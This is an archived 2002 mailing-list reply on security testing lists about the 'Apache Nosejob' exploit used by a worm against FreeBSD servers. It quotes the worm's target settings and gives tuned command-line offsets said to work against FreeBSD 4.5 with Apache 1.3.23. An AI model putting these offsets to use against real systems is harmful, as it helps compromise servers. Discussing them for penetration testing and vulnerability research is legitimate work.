Re: Follow up:Apache Nosejob
From: Craig (Leusent@typeoneg.net) Date: 08/22/02
- Previous message: Darroch: "Re: Follow up:Apache Nosejob"
- In reply to: Jeremy Junginger: "Follow up:Apache Nosejob"
From: Craig <Leusent@typeoneg.net>
To: pen-test@securityfocus.com, vuln-dev@securityfocus.com
Date: Thu, 22 Aug 2002 17:59:09 -0400

On August 22, 2002 01:15 pm, you wrote:
> After performing some research, I noticed that the apache worm that is
> plaguing FreeBSD machines uses the following settings (please correct me
> if I'm wrong):
>
> FreeBSD 4.5 x86 / Apache/1.3.20 (Unix):
> D=-146,
> B= 0xbfbfde00,
> R= 6
> Z= 36
>
> FreeBSD 4.5 x86 / Apache/1.3.22-24 (Unix)
> D=-134
> B= 0xbfbfdb00
> R= 3
> Z=36

After viewing the source code for the apache worm, I did some playing around
with the offsets, and I found that the following offsets seemed to work on
FreeBSD 4.5 w/apache 1.3.23 quite effectively.

-b 0xbfbfdc00
-d -134
-r 3
-z 36

Hope this helps,
Craig Holmes